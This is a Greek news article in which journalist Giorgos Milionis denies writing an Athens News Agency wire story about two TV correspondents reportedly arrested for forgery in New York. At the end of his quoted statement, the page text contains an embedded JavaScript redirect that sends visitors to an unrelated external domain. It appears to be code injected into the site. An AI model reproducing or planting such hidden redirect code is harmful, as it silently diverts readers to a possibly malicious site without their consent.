Δημοσιογράφος του ΑΠΕ: Δεν έγραψα εγώ το κείμενο για τις περούκες

0
16

 

Απάντηση για την εμπλοκή του ονόματός του στην υπόθεση με τους δυο ανταποκριτές των ελληνικών τηλεοπτικών σταθμών του Star και του Alpha, Δημήτρη Σουλτογιάννη και Θάνου Δημάδη αντίστοιχα δίνει ο δημοσιογράφος του ΑΠΕ Γιώργος Μηλιώνης, μέλος του ΔΣ της ΕΣΗΕΑ και στέλεχος του ΠΑΜΕ Τύπου και ΜΜΕ.

Ο Γ. Μηλιώνης ήταν ο απεσταλμένος του Αθηναϊκού – Μακεδονικού Πρακτορείου Ειδήσεων (ΑΜΠΕ) στις ΗΠΑ για την κάλυψη της επίσκεψης του πρωθυπουργού.

Στις ανακοινώσεις τους, οι δυο δημοσιογράφοι τον εμφάνισαν ως τοv συντάκτη του τηλεγραφήματος που δημοσιεύτηκε την Κυριακή 18 Σεπτέμβρη στο Αθηναϊκό Πρακτορείο, το οποίο τους παρουσίαζε να έχουν συλληφθεί για πλαστογραφία από τις αμερικανικές αρχές.

Στη δήλωσή του, ο Γιώργος Μηλιώνης αναφέρει: «Τις τελευταίες ημέρες πληροφορήθηκα ότι το όνομά μου ενεπλάκη στην περιβόητη ιστορία «με τις περούκες» στη Ν. Υόρκη. Περίμενα από όσους έχουν την επαγγελματική, δεοντολογική και ηθική ευθύνη να αποκαταστήσουν πλήρως την αλήθεια γύρω από το σχετικό τηλεγράφημα του ΑΜΠΕ. Δεν το έπραξαν. Κατόπιν τούτου, δηλώνω ανοιχτά και υπεύθυνα ότι ο συντάκτης του εν λόγω τηλεγραφήματος ΔΕΝ είμαι εγώ.

Τα κείμενα τα οποία αποστέλλω στο ΑΜΠΕ φέρουν πάντοτε την υπογραφή μου, είτε με πλήρη αναφορά του ονόματός μου είτε με τα αρχικά Γ.Μ. Η μέχρι τώρα σιωπή μου υπαγορεύθηκε από καθαρά λόγους επαγγελματικής ευσυνειδησίας και υπευθυνότητας, δεδομένου ότι βρισκόμουν σε αποστολή κάλυψης της επίσκεψης του πρωθυπουργού της χώρας στη Ν. Υόρκη και της παρέμβασής του στη ΓΣ του ΟΗΕ. Εξαιτίας αυτού δεν θα επέτρεπα στον εαυτό μου να θέσει υπεράνω τέτοιας σημασίας γεγονότος τη διευθέτηση ενός προσωπικού ζητήματος, πολύ περισσότερο που η αποκατάσταση της αδικίας εις βάρος μου είναι αποκλειστική ευθύνη άλλων.

Γιώργος Μηλιώνης

Δημοσιογράφος» setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here